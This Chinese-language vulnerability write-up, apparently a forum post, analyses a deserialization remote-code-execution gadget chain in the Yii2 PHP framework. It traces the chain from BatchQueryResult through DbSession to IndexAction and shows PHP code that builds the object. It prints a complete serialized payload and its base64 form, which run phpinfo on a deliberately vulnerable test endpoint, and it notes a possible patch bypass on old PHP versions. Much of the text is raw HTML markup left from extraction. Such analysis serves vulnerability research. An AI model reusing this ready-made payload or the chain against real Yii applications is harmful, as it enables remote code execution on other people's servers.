Yii框架反序列化RCE利用链分析
字数 92 2023-02-26 12:04:11
Yii框架反序列化RCE利用链分析
Yii框架反序列化RCE利用链分析
0x01.对比补丁
发现在./yii2/db/BatchQueryResult.php中新增了wakeup方法,在wakeup方法中抛出了一个异常。
我们看下**wakeup方法的介绍:
> unserialize() 会检查是否存在一个 [**wakeup()](https://www.php.net/manual/zh/language.oop5.magic.php#object.wakeup) 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。
用__wakeup()方法抛出一个异常,其实是为了防止BatchQueryResult类被反序列化。
0x02.分析利用链
其实在19年9月份,已经有师傅分析了这条利用链,结尾会放出链接。
首先看yii2/db/BatchQueryResult类中,存在__destruct方法:
看到$this->_dataReader可控,这里有两条利用链可以走:
- 把$this->_dataReader赋值为一个没有close方法的类,调用其__call方法,从而实现代码执行
- 把$this->_dataReader赋值为一个存在close方法的类,需要找到该close方法的调用过程中存在代码执行的调用。
有23个实现了close方法的类,找到关键类:yii2/web/DbSession,代码如下:
当$this->getIsActive为true时,则会调用composeFields方法。我们看下getIsActive的方法的实现:
<?php
// code from yii2/web/Session.php
public function getIsActive()
{
return session_status() === PHP_SESSION_ACTIVE;
}
这里默认安装情况下都返回true,根据大佬描述说装了debug和gii插件,无论开不开启,都返回true。
然后跟进composeFields方法,该方法实现于它的父类:yii2/web/MultiFieldSession。
这里调用了call_user_func函数,并且函数名$this->writeCallback可控,但其参数不可控。可以用[(new
test),"aaa"]来绕过,如果$this->writeCallback传入[(new
test),"aaa"],则会调用test类的公共方法aaa。
所以需要找到一个拥有可以执行命令的公共方法的类,比如:yii2/rest/IndexAction类的run方法,代码如下:
并且call_user_func的两个函数均可控。
到这里利用链分析完毕,其实也是照葫芦画瓢,现学现卖的。
利用链如下:
yii2/rest/IndexAction() ->run()
yii2/web/MultiFieldSession() ->composeFields() # 存在call_user_func,仅可控第一个参数
yii2/web/DbSession()->close()
yii2/db/BatchQueryResult()->reset()
yii2/db/BatchQueryResult()->__destruct()
0x03.通过利用链构造payload
大佬们可能有了利用链很容易构造出payload,我比较菜也是折腾了很久才搞出来。
因为看到文章中放了个工具叫:phpggc,今天一直用这个工具生成payload,但是都在反序列化的时候出错了。后来发现里面确实错了,少了一些属性。
- 实例化一个BatchQueryResult类,并设置其属性$_dataReader
这里因为$_dataReader是私有变量,所以要写一个函数来设置该变量的值。修改yii2/db/BatchQueryResult类的代码加上:
public function setDataReader($value){
$this->_dataReader = $value;
}
然后编写实例化代码:
$bqrObj = new BatchQueryResult();
-
实例化yii2/web/DbSession类,并将对象赋值给$bqrObj的_dataReader变量
-
实例化yii2/rest/IndexAction类,赋值给yii2/web/DbSession类的writeCallback变量: ```php
// 现有代码
$bqrObj = new BatchQueryResult();
$bdsObj = new DbSession();
$indexAction = new IndexAction();
$bdsObj -> writeCallback = array($indexAction,"run");
$bqrObj->setDataReader($bdsObj);
var_dump(serialize($bqrObj));这里要注意实例化IndexAction类时,要注意其构造方法,实现于其父类的父类:\\yii\\base\\Action类  然后跟进其父类Compoent的\_\_construct方法:  继续看Yii::configure的实现:  其实就是便利字典格式数据,把数据以key为变量名,value为值设置给传入的对象。 所以构造demo:public function actionSay($message = 'Hello') { $bqrObj = new BatchQueryResult(); $bdsObj = new DbSession(); $indexAction = new IndexAction(1,1); //config变量非必填 $indexAction-&gt;checkAccess = 'phpinfo'; $bdsObj -&gt; writeCallback = array($indexAction,&quot;run&quot;); $bqrObj-&gt;setDataReader($bdsObj); var_dump(serialize($bqrObj)); return $this-&gt;render('say', ['message' =&gt; $message]); } </code></pre> <p>然后访问web,如下:<br/> <img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/fbbb40d24a34b72f20517e9a2187503cd.jpg"/><br/> 出错,说是$this->modelClass为空,翻看附近的代码。<br/> <img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/f1bf56f2b36e2451996a94c1dcf206ff7.jpg"/><br/> 所以构造demo:<br/> <img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/fb6243236e928a2ecf4b61bb5c1afafa3.jpg"/><br/> 但是:<br/> <img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/fcb77dd50256bd8cf1455378a22f3efac.jpg"/><br/> 仍然显示$this->modelClass未设置,究其原因,是因为实例化的是indexAction而不是yii2/rest/Action类,所以直接$indexAction->modelClass设置不了yii2/rest/Action的modelClass的值。</p> </li> </ul> <p blockindex="23">这时候想到yii2/base/Action类中的__construct方法,可以设置变量,而yii2/rest/Action是yii2/base/Action的子类,可以继承其属性和方法。<br/> 所以修改demo:<br/> <img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/ff9d5dffa38134b5d3b950254d3e2bb01.jpg"/><br/> <img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/f3e9619145340615e479a60deb4aa3634.jpg"/><br/> phpinfo成功执行,payload为:</p> <pre blockindex="24"><code class="hljs language-php">O:<span class="hljs-number">23</span>:&quot;yii\db\BatchQueryResult&quot;:<span class="hljs-number">9</span>:{s:<span class="hljs-number">2</span>:&quot;db&quot;;N;s:<span class="hljs-number">5</span>:&quot;query&quot;;N;s:<span class="hljs-number">9</span>:&quot;batchSize&quot;;i:<span class="hljs-number">100</span>;s:<span class="hljs-number">4</span>:&quot;each&quot;;b:<span class="hljs-number">0</span>;s:<span class="hljs-number">36</span>:&quot; yii\db\BatchQueryResult _dataReader&quot;;O:<span class="hljs-number">17</span>:&quot;yii\web\DbSession&quot;:<span class="hljs-number">13</span>:{s:<span class="hljs-number">2</span>:&quot;db&quot;;O:<span class="hljs-number">17</span>:&quot;yii\db\Connection&quot;:<span class="hljs-number">37</span>:{s:<span class="hljs-number">3</span>:&quot;dsn&quot;;s:<span class="hljs-number">37</span>:&quot;mysql:host=localhost;dbname=yii2basic&quot;;s:<span class="hljs-number">8</span>:&quot;username&quot;;s:<span class="hljs-number">4</span>:&quot;root&quot;;s:<span class="hljs-number">8</span>:&quot;password&quot;;s:<span class="hljs-number">0</span>:&quot;&quot;;s:<span class="hljs-number">10</span>:&quot;attributes&quot;;N;s:<span class="hljs-number">17</span>:&quot;enableSchemaCache&quot;;b:<span class="hljs-number">0</span>;s:<span class="hljs-number">19</span>:&quot;schemaCacheDuration&quot;;i:<span class="hljs-number">3600</span>;s:<span class="hljs-number">18</span>:&quot;schemaCacheExclude&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">11</span>:&quot;schemaCache&quot;;s:<span class="hljs-number">5</span>:&quot;cache&quot;;s:<span class="hljs-number">16</span>:&quot;enableQueryCache&quot;;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">18</span>:&quot;queryCacheDuration&quot;;i:<span class="hljs-number">3600</span>;s:<span class="hljs-number">10</span>:&quot;queryCache&quot;;s:<span class="hljs-number">5</span>:&quot;cache&quot;;s:<span class="hljs-number">7</span>:&quot;charset&quot;;s:<span class="hljs-number">4</span>:&quot;utf8&quot;;s:<span class="hljs-number">14</span>:&quot;emulatePrepare&quot;;N;s:<span class="hljs-number">11</span>:&quot;tablePrefix&quot;;s:<span class="hljs-number">0</span>:&quot;&quot;;s:<span class="hljs-number">9</span>:&quot;schemaMap&quot;;a:<span class="hljs-number">10</span>:{s:<span class="hljs-number">5</span>:&quot;pgsql&quot;;s:<span class="hljs-number">19</span>:&quot;yii\db\pgsql\Schema&quot;;s:<span class="hljs-number">6</span>:&quot;mysqli&quot;;s:<span class="hljs-number">19</span>:&quot;yii\db\mysql\Schema&quot;;s:<span class="hljs-number">5</span>:&quot;mysql&quot;;s:<span class="hljs-number">19</span>:&quot;yii\db\mysql\Schema&quot;;s:<span class="hljs-number">6</span>:&quot;sqlite&quot;;s:<span class="hljs-number">20</span>:&quot;yii\db\sqlite\Schema&quot;;s:<span class="hljs-number">7</span>:&quot;sqlite2&quot;;s:<span class="hljs-number">20</span>:&quot;yii\db\sqlite\Schema&quot;;s:<span class="hljs-number">6</span>:&quot;sqlsrv&quot;;s:<span class="hljs-number">19</span>:&quot;yii\db\mssql\Schema&quot;;s:<span class="hljs-number">3</span>:&quot;oci&quot;;s:<span class="hljs-number">17</span>:&quot;yii\db\oci\Schema&quot;;s:<span class="hljs-number">5</span>:&quot;mssql&quot;;s:<span class="hljs-number">19</span>:&quot;yii\db\mssql\Schema&quot;;s:<span class="hljs-number">5</span>:&quot;dblib&quot;;s:<span class="hljs-number">19</span>:&quot;yii\db\mssql\Schema&quot;;s:<span class="hljs-number">6</span>:&quot;cubrid&quot;;s:<span class="hljs-number">20</span>:&quot;yii\db\cubrid\Schema&quot;;}s:<span class="hljs-number">8</span>:&quot;pdoClass&quot;;N;s:<span class="hljs-number">12</span>:&quot;commandClass&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">10</span>:&quot;commandMap&quot;;a:<span class="hljs-number">10</span>:{s:<span class="hljs-number">5</span>:&quot;pgsql&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">6</span>:&quot;mysqli&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">5</span>:&quot;mysql&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">6</span>:&quot;sqlite&quot;;s:<span class="hljs-number">21</span>:&quot;yii\db\sqlite\Command&quot;;s:<span class="hljs-number">7</span>:&quot;sqlite2&quot;;s:<span class="hljs-number">21</span>:&quot;yii\db\sqlite\Command&quot;;s:<span class="hljs-number">6</span>:&quot;sqlsrv&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">3</span>:&quot;oci&quot;;s:<span class="hljs-number">18</span>:&quot;yii\db\oci\Command&quot;;s:<span class="hljs-number">5</span>:&quot;mssql&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">5</span>:&quot;dblib&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;s:<span class="hljs-number">6</span>:&quot;cubrid&quot;;s:<span class="hljs-number">14</span>:&quot;yii\db\Command&quot;;}s:<span class="hljs-number">15</span>:&quot;enableSavepoint&quot;;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">17</span>:&quot;serverStatusCache&quot;;s:<span class="hljs-number">5</span>:&quot;cache&quot;;s:<span class="hljs-number">19</span>:&quot;serverRetryInterval&quot;;i:<span class="hljs-number">600</span>;s:<span class="hljs-number">12</span>:&quot;enableSlaves&quot;;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">6</span>:&quot;slaves&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">11</span>:&quot;slaveConfig&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">7</span>:&quot;masters&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">12</span>:&quot;masterConfig&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">14</span>:&quot;shuffleMasters&quot;;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">13</span>:&quot;enableLogging&quot;;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">15</span>:&quot;enableProfiling&quot;;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">8</span>:&quot;isSybase&quot;;b:<span class="hljs-number">0</span>;s:<span class="hljs-number">30</span>:&quot; yii\db\Connection _driverName&quot;;N;s:<span class="hljs-number">34</span>:&quot; yii\db\Connection _queryCacheInfo&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">36</span>:&quot; yii\db\Connection _quotedTableNames&quot;;N;s:<span class="hljs-number">37</span>:&quot; yii\db\Connection _quotedColumnNames&quot;;N;s:<span class="hljs-number">27</span>:&quot; yii\base\Component _events&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">35</span>:&quot; yii\base\Component _eventWildcards&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">30</span>:&quot; yii\base\Component _behaviors&quot;;N;}s:<span class="hljs-number">12</span>:&quot;sessionTable&quot;;s:<span class="hljs-number">12</span>:&quot;{{%session}}&quot;;s:<span class="hljs-number">9</span>:&quot; * fields&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">12</span>:&quot;readCallback&quot;;N;s:<span class="hljs-number">13</span>:&quot;writeCallback&quot;;a:<span class="hljs-number">2</span>:{i:<span class="hljs-number">0</span>;O:<span class="hljs-number">20</span>:&quot;yii\rest\IndexAction&quot;:<span class="hljs-number">10</span>:{s:<span class="hljs-number">19</span>:&quot;prepareDataProvider&quot;;N;s:<span class="hljs-number">10</span>:&quot;dataFilter&quot;;N;s:<span class="hljs-number">10</span>:&quot;modelClass&quot;;s:<span class="hljs-number">21</span>:&quot;ActiveRecordInterface&quot;;s:<span class="hljs-number">9</span>:&quot;findModel&quot;;N;s:<span class="hljs-number">11</span>:&quot;checkAccess&quot;;s:<span class="hljs-number">7</span>:&quot;phpinfo&quot;;s:<span class="hljs-number">2</span>:&quot;id&quot;;i:<span class="hljs-number">1</span>;s:<span class="hljs-number">10</span>:&quot;controller&quot;;i:<span class="hljs-number">1</span>;s:<span class="hljs-number">27</span>:&quot; yii\base\Component _events&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">35</span>:&quot; yii\base\Component _eventWildcards&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">30</span>:&quot; yii\base\Component _behaviors&quot;;N;}i:<span class="hljs-number">1</span>;s:<span class="hljs-number">3</span>:&quot;run&quot;;}s:<span class="hljs-number">10</span>:&quot;flashParam&quot;;s:<span class="hljs-number">7</span>:&quot;__flash&quot;;s:<span class="hljs-number">7</span>:&quot;handler&quot;;N;s:<span class="hljs-number">30</span>:&quot; yii\web\Session _cookieParams&quot;;a:<span class="hljs-number">1</span>:{s:<span class="hljs-number">8</span>:&quot;httponly&quot;;b:<span class="hljs-number">1</span>;}s:<span class="hljs-number">34</span>:&quot; yii\web\Session frozenSessionData&quot;;N;s:<span class="hljs-number">30</span>:&quot; yii\web\Session _hasSessionId&quot;;N;s:<span class="hljs-number">27</span>:&quot; yii\base\Component _events&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">35</span>:&quot; yii\base\Component _eventWildcards&quot;;a:<span class="hljs-number">0</span>:{}s:<span class="hljs-number">30</span>:&quot; yii\base\Component _behaviors&quot;;N;}s:<span class="hljs-number">31</span>:&quot; yii\db\BatchQueryResult _batch&quot;;N;s:<span class="hljs-number">31</span>:&quot; yii\db\BatchQueryResult _value&quot;;N;s:<span class="hljs-number">29</span>:&quot; yii\db\BatchQueryResult _key&quot;;N;s:<span class="hljs-number">49</span>:&quot; yii\db\BatchQueryResult mssqlNoMoreRowsErrorCode&quot;;i:-<span class="hljs-number">13</span>;} </code></pre> <h1 blockindex="25">0x04.构造有存在漏洞的demo验证</h1> <p blockindex="26">修改根目录下的controllers/SiteController.php文件,添加一代码:</p> <pre blockindex="27"><code class="hljs language-php"> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">actionSay</span>(<span class="hljs-params"><span class="hljs-variable">$message</span> = <span class="hljs-string">'Hello'</span></span>) </span>{ <span class="hljs-variable">$data</span> = base64_decode(<span class="hljs-variable">$message</span>); unserialize(<span class="hljs-variable">$data</span>); <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;response(<span class="hljs-variable">$data</span>); } </code></pre> <p blockindex="28">将payload进行base64编码:</p> <pre blockindex="29"><code class="hljs language-json">TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjk6e3M6MjoiZGIiO047czo1OiJxdWVyeSI7TjtzOjk6ImJhdGNoU2l6ZSI7aToxMDA7czo0OiJlYWNoIjtiOjA7czozNjoiAHlpaVxkYlxCYXRjaFF1ZXJ5UmVzdWx0AF9kYXRhUmVhZGVyIjtPOjE3OiJ5aWlcd2ViXERiU2Vzc2lvbiI6MTM6e3M6MjoiZGIiO086MTc6InlpaVxkYlxDb25uZWN0aW9uIjozNzp7czozOiJkc24iO3M6Mzc6Im15c3FsOmhvc3Q9bG9jYWxob3N0O2RibmFtZT15aWkyYmFzaWMiO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo4OiJwYXNzd29yZCI7czowOiIiO3M6MTA6ImF0dHJpYnV0ZXMiO047czoxNzoiZW5hYmxlU2NoZW1hQ2FjaGUiO2I6MDtzOjE5OiJzY2hlbWFDYWNoZUR1cmF0aW9uIjtpOjM2MDA7czoxODoic2NoZW1hQ2FjaGVFeGNsdWRlIjthOjA6e31zOjExOiJzY2hlbWFDYWNoZSI7czo1OiJjYWNoZSI7czoxNjoiZW5hYmxlUXVlcnlDYWNoZSI7YjoxO3M6MTg6InF1ZXJ5Q2FjaGVEdXJhdGlvbiI7aTozNjAwO3M6MTA6InF1ZXJ5Q2FjaGUiO3M6NToiY2FjaGUiO3M6NzoiY2hhcnNldCI7czo0OiJ1dGY4IjtzOjE0OiJlbXVsYXRlUHJlcGFyZSI7TjtzOjExOiJ0YWJsZVByZWZpeCI7czowOiIiO3M6OToic2NoZW1hTWFwIjthOjEwOntzOjU6InBnc3FsIjtzOjE5OiJ5aWlcZGJccGdzcWxcU2NoZW1hIjtzOjY6Im15c3FsaSI7czoxOToieWlpXGRiXG15c3FsXFNjaGVtYSI7czo1OiJteXNxbCI7czoxOToieWlpXGRiXG15c3FsXFNjaGVtYSI7czo2OiJzcWxpdGUiO3M6MjA6InlpaVxkYlxzcWxpdGVcU2NoZW1hIjtzOjc6InNxbGl0ZTIiO3M6MjA6InlpaVxkYlxzcWxpdGVcU2NoZW1hIjtzOjY6InNxbHNydiI7czoxOToieWlpXGRiXG1zc3FsXFNjaGVtYSI7czozOiJvY2kiO3M6MTc6InlpaVxkYlxvY2lcU2NoZW1hIjtzOjU6Im1zc3FsIjtzOjE5OiJ5aWlcZGJcbXNzcWxcU2NoZW1hIjtzOjU6ImRibGliIjtzOjE5OiJ5aWlcZGJcbXNzcWxcU2NoZW1hIjtzOjY6ImN1YnJpZCI7czoyMDoieWlpXGRiXGN1YnJpZFxTY2hlbWEiO31zOjg6InBkb0NsYXNzIjtOO3M6MTI6ImNvbW1hbmRDbGFzcyI7czoxNDoieWlpXGRiXENvbW1hbmQiO3M6MTA6ImNvbW1hbmRNYXAiO2E6MTA6e3M6NToicGdzcWwiO3M6MTQ6InlpaVxkYlxDb21tYW5kIjtzOjY6Im15c3FsaSI7czoxNDoieWlpXGRiXENvbW1hbmQiO3M6NToibXlzcWwiO3M6MTQ6InlpaVxkYlxDb21tYW5kIjtzOjY6InNxbGl0ZSI7czoyMToieWlpXGRiXHNxbGl0ZVxDb21tYW5kIjtzOjc6InNxbGl0ZTIiO3M6MjE6InlpaVxkYlxzcWxpdGVcQ29tbWFuZCI7czo2OiJzcWxzcnYiO3M6MTQ6InlpaVxkYlxDb21tYW5kIjtzOjM6Im9jaSI7czoxODoieWlpXGRiXG9jaVxDb21tYW5kIjtzOjU6Im1zc3FsIjtzOjE0OiJ5aWlcZGJcQ29tbWFuZCI7czo1OiJkYmxpYiI7czoxNDoieWlpXGRiXENvbW1hbmQiO3M6NjoiY3VicmlkIjtzOjE0OiJ5aWlcZGJcQ29tbWFuZCI7fXM6MTU6ImVuYWJsZVNhdmVwb2ludCI7YjoxO3M6MTc6InNlcnZlclN0YXR1c0NhY2hlIjtzOjU6ImNhY2hlIjtzOjE5OiJzZXJ2ZXJSZXRyeUludGVydmFsIjtpOjYwMDtzOjEyOiJlbmFibGVTbGF2ZXMiO2I6MTtzOjY6InNsYXZlcyI7YTowOnt9czoxMToic2xhdmVDb25maWciO2E6MDp7fXM6NzoibWFzdGVycyI7YTowOnt9czoxMjoibWFzdGVyQ29uZmlnIjthOjA6e31zOjE0OiJzaHVmZmxlTWFzdGVycyI7YjoxO3M6MTM6ImVuYWJsZUxvZ2dpbmciO2I6MTtzOjE1OiJlbmFibGVQcm9maWxpbmciO2I6MTtzOjg6ImlzU3liYXNlIjtiOjA7czozMDoiAHlpaVxkYlxDb25uZWN0aW9uAF9kcml2ZXJOYW1lIjtOO3M6MzQ6IgB5aWlcZGJcQ29ubmVjdGlvbgBfcXVlcnlDYWNoZUluZm8iO2E6MDp7fXM6MzY6IgB5aWlcZGJcQ29ubmVjdGlvbgBfcXVvdGVkVGFibGVOYW1lcyI7TjtzOjM3OiIAeWlpXGRiXENvbm5lY3Rpb24AX3F1b3RlZENvbHVtbk5hbWVzIjtOO3M6Mjc6IgB5aWlcYmFzZVxDb21wb25lbnQAX2V2ZW50cyI7YTowOnt9czozNToiAHlpaVxiYXNlXENvbXBvbmVudABfZXZlbnRXaWxkY2FyZHMiO2E6MDp7fXM6MzA6IgB5aWlcYmFzZVxDb21wb25lbnQAX2JlaGF2aW9ycyI7Tjt9czoxMjoic2Vzc2lvblRhYmxlIjtzOjEyOiJ7eyVzZXNzaW9ufX0iO3M6OToiACoAZmllbGRzIjthOjA6e31zOjEyOiJyZWFkQ2FsbGJhY2siO047czoxMzoid3JpdGVDYWxsYmFjayI7YToyOntpOjA7TzoyMDoieWlpXHJlc3RcSW5kZXhBY3Rpb24iOjEwOntzOjE5OiJwcmVwYXJlRGF0YVByb3ZpZGVyIjtOO3M6MTA6ImRhdGFGaWx0ZXIiO047czoxMDoibW9kZWxDbGFzcyI7czoyMToiQWN0aXZlUmVjb3JkSW50ZXJmYWNlIjtzOjk6ImZpbmRNb2RlbCI7TjtzOjExOiJjaGVja0FjY2VzcyI7czo3OiJwaHBpbmZvIjtzOjI6ImlkIjtpOjE7czoxMDoiY29udHJvbGxlciI7aToxO3M6Mjc6IgB5aWlcYmFzZVxDb21wb25lbnQAX2V2ZW50cyI7YTowOnt9czozNToiAHlpaVxiYXNlXENvbXBvbmVudABfZXZlbnRXaWxkY2FyZHMiO2E6MDp7fXM6MzA6IgB5aWlcYmFzZVxDb21wb25lbnQAX2JlaGF2aW9ycyI7Tjt9aToxO3M6MzoicnVuIjt9czoxMDoiZmxhc2hQYXJhbSI7czo3OiJfX2ZsYXNoIjtzOjc6ImhhbmRsZXIiO047czozMDoiAHlpaVx3ZWJcU2Vzc2lvbgBfY29va2llUGFyYW1zIjthOjE6e3M6ODoiaHR0cG9ubHkiO2I6MTt9czozNDoiAHlpaVx3ZWJcU2Vzc2lvbgBmcm96ZW5TZXNzaW9uRGF0YSI7TjtzOjMwOiIAeWlpXHdlYlxTZXNzaW9uAF9oYXNTZXNzaW9uSWQiO047czoyNzoiAHlpaVxiYXNlXENvbXBvbmVudABfZXZlbnRzIjthOjA6e31zOjM1OiIAeWlpXGJhc2VcQ29tcG9uZW50AF9ldmVudFdpbGRjYXJkcyI7YTowOnt9czozMDoiAHlpaVxiYXNlXENvbXBvbmVudABfYmVoYXZpb3JzIjtOO31zOjMxOiIAeWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQAX2JhdGNoIjtOO3M6MzE6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfdmFsdWUiO047czoyOToiAHlpaVxkYlxCYXRjaFF1ZXJ5UmVzdWx0AF9rZXkiO047czo0OToiAHlpaVxkYlxCYXRjaFF1ZXJ5UmVzdWx0AG1zc3FsTm9Nb3JlUm93c0Vycm9yQ29kZSI7aTotMTM7fQ== </code></pre> <p blockindex="30"><img alt="image.png" referrerpolicy="no-referrer" src="https://shs3.b.qianxin.com/butian_public/f314cebd8c4125d683f89cd857d6da666.jpg"/></p> <h1 blockindex="31">0x05.补丁绕过分析</h1> <p blockindex="32">可参考CVE-2016-7124漏洞php的__wakeup方法绕过。<br/> CVE-2016-7124的影响范围:</p> <ul blockindex="33"> <li>PHP5 < 5.6.25</li> <li>PHP7 < 7.0.10</li> </ul> <p blockindex="34">也就是说在低版本的php当中,可能会造成补丁失效,暂未测试。</p></div></div> <div class="post-opt mt-30"> <ul class="list-inline text-muted"> <li> <i class="fa fa-clock-o"></i> 发表于 2021-04-07 20:03:19 </li> <li>阅读 ( 1053 )</li> <li>分类:<a href="https://forum.butian.net/community/Vul_analysis" rel="noopenner noreferrer" target="_blank">漏洞分析</a> </li> </ul> </div> </div> <div class="text-center mt-30 mb-20"> </div> </div>
public function getIsActive ( ) { return session_ status() === PHP_ SESSION_ ACTIVE; }